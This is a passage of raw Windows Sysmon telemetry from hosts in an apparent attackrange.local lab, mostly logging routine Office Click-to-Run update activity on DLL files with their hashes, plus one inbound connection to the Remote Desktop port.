14:55:41.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EURO\MSOEURO.DLLMD5=DAF47CFE9A812F01DE1F697AC7061392,SHA256=FED6CEB75CE826B2E0030DADF81D6AFFE7E6D770F984924FB01CC9721BBDDA57,IMPHASH=29D18E0C96B1B64C0465E1DE8AF7A5FEtruetrue 23542300x800000000000000070810Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\vcruntime140.dllMD5=E51018E4985943C51FF91471F8906504,SHA256=FF9C1123CFF493A8F5EACB91115611B6C1C808B30C82AF9B6F388C0EF1F6B46D,IMPHASH=DBF59B100B5A77256457CF057352B441truetrue 23542300x800000000000000070809Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\vccorlib140.dllMD5=E88E2BF24A4D846C7F8E313D75EED528,SHA256=2F7E17BC746ABF55122EE1D2608DB7240DE4B4428BE13DFEE8C3E03DB6F9B360,IMPHASH=E2C243EAA5D873A145FCEF834080DE02truetrue 23542300x800000000000000070808Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.157{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\ucrtbase.dllMD5=3E0303F978818E5C944F5485792696FD,SHA256=7041885B2A8300BF12A46510228CE8D103D74E83B1BAF696B84FF3E5AB785DD1,IMPHASH=71F1D8A10F840FFEE6964317E974D463truetrue 23542300x800000000000000070807Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\msvcr120.dllMD5=1A22AC29230FF06E278CF85992F48C86,SHA256=3A3F61F1D187142BBA9B37B318F6052A09743FF24FCDB3CEE478D1BC5C68D300,IMPHASH=AA8D086DEB6960B10F8791DF466A5610truetrue 23542300x800000000000000070806Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.126{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\msvcp140.dllMD5=5FD0772C30A923159055E87395F96D86,SHA256=02C7259456EAC8CBADFB460377BA68E98282400C7A4A9D0BF49B3313EF6D554D,IMPHASH=F2D585FF96AFA3A77E09F5B37E7B3230truetrue 23542300x800000000000000070805Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.126{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\msvcp120.dllMD5=E3244FDCEC84C99E4B60227EB3B70893,SHA256=81FBC2824E73F0D101D91854694A52E79DB0FFAADBB2A10DEAAF47B3B7F9B2B0,IMPHASH=6CCDA270A497A2C5A36A7F385CC9910Dtruetrue 23542300x800000000000000070804Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.110{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\mfc140u.dllMD5=F8EBBB4C28AB643471B124701DA5B71A,SHA256=DF8543E39C6C04440734A26B25A8ADB34460D4AD08FD41E2468F067F1284E582,IMPHASH=C2C401022BB95036E7638802C8DA49BDtruetrue 23542300x800000000000000070803Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.063{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\concrt140.dllMD5=773091E3923378F9B529CDA45E32C489,SHA256=6CC8FA5CE54B2B8C99E22A0E37179EBA9D418568D142AC58FAD52DD28E867A17,IMPHASH=720042EA97BFDE1DFC328C5715BE448Dtruetrue 23542300x800000000000000070802Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-crt-utility-l1-1-0.dllMD5=D6ABF5C056D80592F8E2439E195D61AC,SHA256=8858D883D180CEA63E3BF4A3F5BC9E0F9FA16C9A35A84C4EFE65308CEA13A364,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070801Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-crt-time-l1-1-0.dllMD5=1FA7C2B81CDFD7ACE42A2A9A0781C946,SHA256=CAFDB772A1D7ACF0807478FDBA1E00FD101FC29C136547B37131F80D21DACFFD,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070800Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-crt-string-l1-1-0.dllMD5=5E72659B38A2977984BBC23ED274F007,SHA256=44A4DB6080F6BDAE6151F60AE5DC420FAA3BE50902E88F8F14AD457DEC3FE4EA,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070799Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-crt-stdio-l1-1-0.dllMD5=32D7B95B1BCE23DB9FBD0578053BA87F,SHA256=104A76B41CBD9A945DBA43A6FFA8C6DE99DB2105D4CE93A717729A9BD020F728,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070798Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-crt-runtime-l1-1-0.dllMD5=AE3FA6BF777B0429B825FB6B028F8A48,SHA256=66B86ED0867FE22E80B9B737F3EE428BE71F5E98D36F774ABBF92E3AACA71BFB,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070797Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-crt-process-l1-1-0.dllMD5=8F8A47617DFD829A63E3EC4AFF2718D9,SHA256=6D4A1AAD695A3451C2D3F564C7CC8D37192CD35539874DF6AE55E24847E51784,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070796Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-crt-private-l1-1-0.dllMD5=1DD5666125B8734E92B1041139FA6C37,SHA256=D0FF5F6BB94961D4C17F0709297A6B5A5FA323C9AC82F4FE27187912B4B13CF3,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070795Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.032{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-crt-multibyte-l1-1-0.dllMD5=809BC1010EAF714CD095189AF236CE2F,SHA256=B52F2B9DE19D12B0E727E13E3DDE93009E487BFB2DD97FD23952C7080949D97E,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070794Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.032{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-crt-math-l1-1-0.dllMD5=D0D380AF839124368A96D6AA82C7C8AE,SHA256=06985D00BF4985024E95442702BBDB53C2127E99F16440424F3380A88883F1A5,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070793Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.032{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-crt-locale-l1-1-0.dllMD5=E70D8FE9D21841202B4FD1CF55D37AC5,SHA256=E087F611B3659151DFB674728202944A7C0FE71710F280840E00A5C4B640632D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070792Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.032{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-crt-heap-l1-1-0.dllMD5=39D81596A7308E978D67AD6FDCCDD331,SHA256=3D109FD01F6684414D8A1D0D2F5E6C5B4E24DE952A0695884744A6CBD44A8EC7,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070791Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.032{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-crt-filesystem-l1-1-0.dllMD5=AB8734C2328A46E7E9583BEFEB7085A2,SHA256=921B7CF74744C4336F976DB6750921B2A0960E8AA11268457F5ED27C0E13B2C8,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070790Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.032{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-crt-environment-l1-1-0.dllMD5=45C54A21261180410091CEFB23F6A5AE,SHA256=2B0FEA07DB507B7266346EAB3CA7EDE3821876AADC519DAF059B130B85640918,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070789Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.032{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-crt-convert-l1-1-0.dllMD5=5245F303E96166B8E625DD0A97E2D66A,SHA256=90A63611D9169A8CD7D030CD2B107B6E290E50E2BEBA6FA640A7497A8599AFF5,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070788Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.032{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-crt-conio-l1-1-0.dllMD5=3B038338C1EB179D8EEE3883CF42BC3E,SHA256=C17786E9031062F56E4B205F394A795E11EF9367B922763DDF391F2ACAB2E979,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070787Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.032{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-core-xstate-l2-1-0.dllMD5=E20C50CB320A5718AE869D8EC4D460CA,SHA256=48C776F38EAED72CB05A993484F60CBFDF5AF59AEBC48E53481A997AE7DED8DC,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070786Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.032{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-core-timezone-l1-1-0.dllMD5=A20084F41B3F1C549D6625C790B72268,SHA256=0FA42237FD1140FD125C6EDB728D4C70AD0276C72FA96C2FAABF7F429FA7E8F1,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070785Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.032{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-core-synch-l1-2-0.dllMD5=F6B4D8D403D22EB87A60BF6E4A3E7041,SHA256=25687E95B65D0521F8C737DF301BF90DB8940E1C0758BB6EA5C217CF7D2F2270,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070784Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.032{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-core-processthreads-l1-1-1.dllMD5=C2EAD5FCCE95A04D31810768A3D44D57,SHA256=42A9A3D8A4A7C82CB6EC42C62D3A522DAA95BEB01ECB776AAC2BFD4AA1E58D62,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070783Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-core-localization-l1-2-0.dllMD5=3B9D034CA8A0345BC8F248927A86BF22,SHA256=A7AC7ECE5E626C0B4E32C13299E9A44C8C380C8981CE4965CBE4C83759D2F52D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070782Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-core-file-l2-1-0.dllMD5=BFB08FB09E8D68673F2F0213C59E2B97,SHA256=6D5881719E9599BF10A4193C8E2DED2A38C10DE0BA8904F48C67F2DA6E84ED3E,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070781Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-core-file-l1-2-0.dllMD5=F6D1216E974FB76585FD350EBDC30648,SHA256=348B70E57AE0329AC40AC3D866B8E896B0B8FEF7E8809A09566F33AF55D33271,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070780Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\1033\EEINTL.DLLMD5=F3E1265F2F72F0F30464C19FC0D9263D,SHA256=092167FB8180160D65AB2F79CC9FBA22EF91580AF15BE7BCDDB27AC5613F34DD,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070779Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DWTRIG20.EXEMD5=F3C9EECD863F094209AF147B4610D275,SHA256=9A6C8B37A8501059D61E60E8A47A5EE152C5E38FEDAF15197982108F1F7A4DB1,IMPHASH=AA7EC0DA9DDED51563104F70A6918F74truetrue 23542300x800000000000000070778Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:41.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXEMD5=B10B5BBDAF90F276F73F3CA9F0FB08C8,SHA256=ED0597A18DEA33D907E60A2645B672E2C90C25E67BA74DDBAC8E1A401742A643,IMPHASH=A02554DF964575E04AC6373A00FBA901truetrue 354300x800000000000000049799Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:39.840{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-55751-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049798Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:41.085{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98BA8A6CB8F515E65430BF950C15527D,SHA256=709B26B8CC8C523E2827DA026AA7D790A317DCA15BA8EBE5DF0BF969E5A81E05,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070919Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:42.985{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\xmlrwbin_xl.dllMD5=A86E0E527AC2197FD08003C9C1023F52,SHA256=DCE27BBBF3FD114F57599E7F7254A66525DCEBD236EA3695F278A6FCF2DB373B,IMPHASH=9C2D03AB590F9DB409C8ECBB2409A95Etruetrue 23542300x800000000000000070918Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:42.985{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\tmtransactions_xl.dllMD5=1F1429AD8DA80580D3E887D3C9324A29,SHA256=06CA5B98F025667F12409A1A182AA365CEFCAAA68A492DF6F39FA7D730497ACC,IMPHASH=D0CF4C45F78D80E95B7D3B5E0255E1C3truetrue 23542300x800000000000000070917Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:42.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\tmpersistence_xl.dllMD5=F6753856E0D05EF9D8C7F118CDFC099E,SHA256=EF07DBF029655D3E74622EF2672647C951E11931F71B909773B4C803F93C08AB,IMPHASH=BAB7EF3250ACAB886C6619681ED10360truetrue 23542300x800000000000000070916Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:42.938{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\tmcachemgr_xl.dllMD5=593757E5399BF4E698DC0C8A50804BB9,SHA256=B5B341C6B190592F8906D708FED30584CF8088238B0A202CD08D9257455D863A,IMPHASH=7F1FC39B1756160BE7895C1D5F36C4D6truetrue 23542300x800000000000000070915Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:42.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\tmapi_xl.dllMD5=E73D197EE175DA50030F4B891867E766,SHA256=882097E961E23C61CA6DFEA9C86D83A4944C9E61FC7B7435E5B322BBB6E29DA5,IMPHASH=4CA8D393BAC6DBB76D9D3E5748A51BC3truetrue 23542300x800000000000000070914Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:42.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft 